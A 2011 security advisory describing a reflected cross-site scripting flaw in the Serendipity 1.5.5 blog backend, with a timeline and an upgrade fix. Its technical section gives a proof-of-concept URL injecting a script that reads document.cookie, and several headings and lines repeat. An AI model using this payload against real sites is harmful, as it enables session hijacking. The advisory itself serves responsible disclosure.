SSCHADV2011-015 - Serendipity 'serendipity[filter][bp.ALT]' Cross-Site Scripting vulnerability
Advisory:
|
Serendipity ‘serendipity[filter][bp.ALT]’ Cross-Site Scripting vulnerability
|
Advisory ID:
|
SSCHADV2011-015
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Serendipity 1.5.5
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
CVE-ID:
|
-
|
======================
Vulnerability Description:
======================
The parameter "serendipity[filter][bp.ALT]" in Serendipity backend is prone to a Cross-Site Scripting vulnerability
Vulnerability Description:
======================
The parameter "serendipity[filter][bp.ALT]" in Serendipity backend is prone to a Cross-Site Scripting vulnerability
==============
Technical Details:
==============
Technical Details:
==============
http://<target>/serendipity/serendipity_admin_image_selector.php?serendipity[filter][bp.ALT]=</script><script>alert(document.cookie)</script>&go=+-+Go!–
=====
Solution:
=====
Solution:
=====
Upgrade to Serendipity 1.6
================
Disclosure Timeline:
================
Disclosure Timeline:
================
22-Sep-2011 – informed developers
27-Oct-2011 – fixed by vendor
02-Nov-2011 – release date of this security advisory
02-Nov-2011 – release date of this security advisory
02-Nov-2011 – post on BugTraq
====
Credits:
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
References:
=======
Comments
Display comments as Linear | Threaded